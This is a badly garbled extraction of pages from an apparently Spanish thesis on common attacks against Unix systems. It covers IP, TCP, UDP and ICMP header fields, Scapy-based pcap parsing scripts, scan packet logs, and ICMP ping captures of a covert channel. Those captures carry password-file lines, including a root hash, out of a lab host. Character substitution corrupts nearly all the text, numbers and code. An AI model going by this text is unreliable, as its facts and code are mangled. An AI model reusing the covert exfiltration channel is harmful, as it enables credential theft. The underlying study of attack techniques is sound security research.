87entifi!a7or 7e .e!uen!ia Time to 2i@e Dire!!i%n 8P Origen - .our!e #77re Dire!!i%n 8P De tino - De tination #77re Op!ione 9op!iona":
160/192T Dato
Flags%
(it 0 $e er@a7o (it 1 No Bragmentar - DB (it 2 3] Bragmento - 3B
Bersi-n ;1 Bits>% "ara 7!v1 ;este caso> es igual a .9.*... Lon)itud del Fnca(e3ado ;7=: N 6nternet Header >engt > ;1 bits>% Cantidad de "alabras de -2 bits que ocu"a el encabezado# li itando el encabezado total ;ca "os obligatorios _ o"cionales> a J. b'tes. Lon)itud Total en &!tes ;*J bits>% Contiene la longitud total del datagra a# inclu'endo encabezado ' "a'load. Identi=icador de Aecuencia ;*J bits># 2la)s ;- bits>% Contiene un nG ero Gnico de identi/icacion# necesario cuando el datagra a es "arte de un
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5. de 22O
datagra a
s grande "ero /rag entado anterior ente# circunstancia en que 9i o de saltos "or los cuales este
ID de 4rotocolo ;O Bits>% 75 del "rotocolo enca"sulado en el "a'load# de acuerdo al listado descri"to en el <FC +0.. !or eje "lo# 7CM!a.9.*# FC!a.9.J ' 25!a.9**. /9ec:sum ;*J bits>% <esultado del algorit o de correcci8n de errores a"licado al encabezado. Direcci-n I4 0ri)en ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! origen. !or eje "lo% *02.*JO...J. a .9C. .9AO .9.. .9-C. Direcci-n I4 Destino ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! destino.
160/192T Dato
4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del seg ento FC!. !or eje "lo# 5O.+*a.9E2 .95+. 4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del seg ento FC!. !or eje "lo# 22a.9.. .9*J. @G ero de ,ecuencia ;-2 Bits>% 5ebe su e9istencia al esque a de interca bio de datos /iable de FC!. Fiene un doble rol%
,i el bit de ,K@ est activado ;es igual a .9*># entonces este nG ero es el 7,@ ;6nitial Secuence Gumber N @G ero de ,ecuencia 7nicial> ' el "ri er b'te de datos es el nG ero de secuencia s uno. ,i no# entonces el "ri er b'te de datos es el nG ero de secuencia.
@G ero de ACR ;-2 Bits>% ,i el bit de ACR est activado ;.9*># entonces el
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5* de 22O
?//set de 5atos ;1 Bits>% Fa aBo del encabezado en "alabras de -2 bits. El )ni o es de 5 "alabras ;*J. bits a 2. b'tes># ' el "alabras a .9.**.. 9i o es de *5 ;1O. bits a J. b'tes>. !or eje "lo# si el encabezado es de 21 b'tes a *02 bits a J Flags ;O Bits>%
2<P% 7ndica que el ca "o de "untero a datos urgentes es signi/icativo. ACR% 7ndica que el ca "o de @G ero de ACR es signi/icativo. !,=% Funci8n de Pus . <,F ;:eset>% <einicia la cone9i8n. ,K@% ,incroniza nG eros de secuencia# indica el inicio de la cone9i8n. F7@% Finalizaci8n de env)o de datos. ecanis o FC! de Cventanas deslizantesD.
4indoI ,ize N Fa aBo de Lentana ;*J Bits>% Fa aBo en b'tes de la ventana rece"tora# "arte del C$ec6su ;*J Bits>% ,u a de co "robaci8n ;c$equeo "or errores> del
!untero 2rgente ;*J Bits>% ,i el bit 2<P est activado# este valor es el des"laza iento ;offset> que $a' que su ar al valor del @G ero de ,ecuencia "ara obtener el Glti o b'te de los datos urgentes. 0pciones ;Lariable>% =a' o"ciones FC! de/inidas en <FCs "osteriores al +0* ' que se utilizan co Gn ente# co o "or eje "lo el ,ACR# 4indoI ,cale ' M,, ;/aximum Segment Si$e>.
4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del datagra a 25!. !uede que no sea necesario# en ese caso deber)a ser ..
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *52 de 22O
4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del datagra a 25!. Lon)itud ;*J Bits>% :ongitud en b'tes del datagra a co "leto# encabezado ' datos. /9ec:sum ;*J Bits>% ,u a de co "robaci8n del datagra a co "leto.
8D \ 87entifi!a7or
Tipo de I/14 ;O Bits>% Corres"onde al ti"o de "aquete 7CM!# "or eje "lo .9O es un Ec$o <equest ;!ing> ' un .9. un Ec$o <e"l' ;!ong># un .9- es un 5estination 2nreac$able. En la co binar con el c8digo. ientras que a'or)a de casos co o este
Glti o# "ara obtener el signi/icado co "leto del "aquete 7CM! se lo debe /-di)o ;O Bits>% En caso de que sea necesario ;"ara algunos ti"os de "aquete 7CM!># este ca "o brinda s in/or aci8n. !or eje "lo# si el ca "o Fi"o es igual a .9-# este ca "o "uede tener valores desde el . ;<ed 5estino 7nalcanzable ( (estination Get.ork Unreac able> al *- ;Co unicaci8n Ad inistrativa ente Pro ibited>.
!ro$ibida
&ommunication
4dministrativel1
/9ec:sum ;*J Bits>% ,u a de co "robaci8n del encabezado _ datos. ID Q Identi=icador ;*J Bits>% Este ca "o contiene un valor Gnico de identi/icaci8n# que deber)a ser retornado en caso de un Ec$o <e"l'. N'mero de Aecuencia ;*J Bits>% Este ca "o se inicializa en . en el "ri er Ec$o <equest ' luego es incre entado en cada env)o.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5- de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *51 de 22O
so/tIare LM4are 4or6station*+- J...- "ara AM5J1. Fodas las is a <ed :A@ ;*02.*JO....&21>.
RA1
*#5PB *2OMB 25JMB 25JMB 25JMB
Aistema 0perativo
2buntu P@2&Linux +.*. 5es6to" N Rernel +.#.++ 0pen&AD 2ni9 <.+ . J1 Bits 2ree&AD 2ni9 ".$ ( J1 Bits 2buntu P@2&Linux J..J.2 ,erver N Rernel +.#.7 <ed =at Linux J.2 N Rernel +.+.7<
ca "o 7!(75# "or lo que se cre8 otro scri"t "ara $acerlo "osible% pcapRparser.p!. uestra el c8digo /uente de a bos scri"ts.
VVV parser.pD < te m%7u"o obtiene un ! @ eDporta7o 7e &ire 'ar6 E "o formatea para que o!upe meno an!'o4 a!]n7o"o por t7out. #utor: 3ar!e"o Bern]n7eO
*+* ,itio del Ca"turador de Fr/ico de <ed 4ires$ar6% $tt"%&&III.Iires$ar6.org& *+2 ,itio del ,iste a ?"erativo 2buntu P@2&:inu9% $tt"%&&III.ubuntu.co *+- ,itio de LM4are% $tt"%&&III.v Iare.co *+1 ,itio del lenguaje !'t$on% $tt"%&&III."'t$on.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *55 de 22O
VVV pcapNparser.pD < te !ript !arga un ar!'i@o p!ap guar7a7o por eYemp"o !on &ire 'ar6 E re!on truir u paquete !on .!apE4 para !ua"quier obYeti@o 9por eYemp"o4 ir@e para 'a!er rep"aE 7e a"guna trama 4 paquete o egmento 4 a !ua"quier ni@e":. <n e te !a o en parti!u"ar4 e" main itera por !a7a paquete 7e" p!ap E ""ama a una fun!ion VprintApa!6etV para que "a imprima por t7out. 2a @entaYa !ontra e" eDport 7e &ire 'ar6 e que pue7o imprimir !ua"quier !ampo a !ua"quier ni@e" 7e !a7a paquete4 obtenien7o un !ontro" tota" 7e" pro!e o. .urgi% !omo ne!e i7a7 7e formatear un 87"e .!an4 7on7e era ne!e ario mo trar e" 8P-8D 7e !a7a paquete 7e" Uombie. Te!ni!a para temp"ate en!i""o : 'ttp:;;>>>.noa'.org;>i6i;PEt'onAtemp"ate
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5J de 22O
8n -10: from !apE import Q <$$O$: <rror 7uring e@a"uation of !onfig fi"e -None0 Tra!eba!6 9mo t re!ent !a"" "a t:: Bi"e V;@ar;"ib;pEt'on- upport;pEt'on(.5; !apE.pEV4 "ine 1(1)54 in rea7A!onfigAfi"e eDe!fi"e9!onfigfi"e: TEpe<rror: eDe!fi"e9: argument 1 mu t be tring4 not None ,rear e" ar!'i@o d;. !apEA tartup.pE4 !on e" !oman7o Vtou!' d;. !apEA tartup.pEV #utor: 3ar!e"o Bern]n7eO VVV N < !apo to7o "o !ampo que quiero que pare ee !apE !on SS T<3P2#T< 1 VVVPaquete nro. S - Tiempo Sf 3a! Origen: SS<t'er. r!SS -> 3a! De tino: SS<t'er.7 tSS 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS 2en:SS8P."enSS 8D:SS8P.i7SS Brag:S S8P.fragSS TT2:SS8P.tt"SS 9...: T,P ?ea7er: .Port:SSr4T,P. portSS DPort:SSr4T,P.7portSS .eqN:SST,P. eqSS #!6N:SST,P.a!6SS B"ag :0DSS0(Dr4T,P.f"ag SS9SST,P.f"ag SS: &n7:S ST,P.>in7o>SS 9...: De !rip!ion: S VVV T<3P2#T<A8,3P 1 VVVPaquete nro. S - Tiempo Sf 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS Proto:0DSS0(Dr48P.protoSS 9SS8P.protoS S: 9...: 8,3P ?ea7er: Tipo:0DSS0(Dr48,3P.tEpeSS ,o7igo:SS8,3P.!o7eSS De !rip!ion: S VVV de6 printApa!6et 9paquete :: VVV < ta fun!ion re!ibe una "i ta 7e in tan!ia 7e imprime 7e a!uer7o a "a @ariab"e temp"ate. VVV !apE.<t'er E "o no me gusta,
# El formato Pcap guarda el tiempo desde el Epoch, a m # prefiero en relaci!n a la primera trama capturada OeroAtime 1 paquete -00.time in7eD 1 0
6or p in paquete : in7eD P1 1 re"ati@eAtime 1 p.time - OeroAtime # "rmo un template dinmico para pasarle al sprintf#) VVV < t] 7i ponib"e tambiXn "a 6eEname prn para imprimir a"go en parti!u"ar E "a "fi"ter para fi"trar por a"g^n par]metro paquete . ummarE9prn 1 "amb7a9p:: p.fie"7 : paquete . ummarE9"fi"ter 1 "amb7a9p:: p-T,P0. r! 11 V19(.16).0.(V:VVV temp"ate 1 T<3P2#T< S 9in7eD4 re"ati@eAtime4 p. ummarE9:: print p. printf9temp"ate:
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5+ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5O de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *50 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J* de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J2 de 22O
B.2.O.1 A as ,can
8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000300 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.031)96 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 357(5 > (( -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: + - Tiempo: 0.03(109 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 357(5 > (1 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 5 - Tiempo: 0.03((17 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (1 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 6 - Tiempo: 0.03(()7 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: 357(5 > (0 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 7 - Tiempo: 0.03(36+ 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (0 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J- de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J1 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J5 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *JJ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J+ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *JO de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J0 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+* de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+2 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+- de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+1 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+5 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+J de 22O
aE
19(.16).0.(
Paquete nro. ( - Tiempo 0.000795 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:0!:(9:a6:)0:7)
aE
19(.16).0.60
Paquete nro. 3 - Tiempo 0.+(005+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D0) ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.( > 19(.16).0.60 e!'o-reque t 0 Paquete nro. + - Tiempo 0.+(0+11 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D00 ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( e!'o-rep"E 0 Paquete nro. 5 - Tiempo 0.)(39+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *++ de 22O
aE
19(.16).0.60
Paquete nro. 1( - Tiempo 3.30)5)6 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f Paquete nro. 13 - Tiempo 3.707)1+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D05 9 t: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60
aE
19(.16).0.(
Paquete nro. 1+ - Tiempo 3.70)1+9 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 15 - Tiempo +.111)77 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:535)0 > 19(.16).0.60:535)0 # Paquete nro. 16 - Tiempo +.11((9( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.60:535)0 > 19(.16).0.(:535)0 $ Paquete nro. 17 - Tiempo +.515)37 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D07 97: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 7
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+O de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+0 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O* de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O2 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O- de 22O
aE
19(.16).0.60
Paquete nro. )7 - Tiempo (5.6(5)06 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f
aE
19(.16).0.(
Paquete nro. )) - Tiempo (6.+(65+0 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(0 93(: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 3( Paquete nro. )9 - Tiempo (6.+(7110 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 90 - Tiempo (7.(3++93 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(1 933: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O1 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O5 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *OJ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O+ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *OO de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O0 de 22O
Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?
Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte :
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0. de 22O
mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M !at (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?
Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0* de 22O
Brame + 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D1f(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7656+)5+616,+C303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 0! 9+ 1e 63 3a (6 61 3a 6e 65 3a (9 7+ 00 6b 30 3a 6! (a 65 7( e1 39 00 6+ 3a (f (f 3a (7 3a a( 00 1f 6f 3a 7( 6( 30 61 (f (6 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 17 01 1( 76 30 7+ (f 3a 69 6f 31 )+ 01 56 3a 3a 6( 3a 6e 7+ 96 bf 00 +) +3 (f 61 30 (0 3a 5b !0 63 5+ 6) 75 73 3a 53 0a 1f a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 0( 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..:..e..1.-...<. ..t9..I......... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:
Brame 5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+6+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 00 00 00 61 30 73 3a 17 9+ 0( 63 3a 79 (f 31 !1 0) 6b +f 73 7( 96 bf 00 6+ 77 7+ 6f 5b 00 +6 6f 6e 65 6f 1f 00 +5 6f 65 67 7+ 00 +0 1) 7( 7( (0 3a 0! 01 1( (a (0 70 (f (9 37 0( 3a 6f 7( 75 e1 39 00 31 66 6f 73 a( !0 63 3a (0 63 7( (6 a) 6! 31 67 65 (f 0) 00 61 3a 61 73 73 00 1e 76 3a 6e 73 6( +5 !0 65 30 79 65 69 00 a) 6( 3a (0 73 6e ..1.-...:..e..<. ......I.79...... ....B<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *02 de 22O
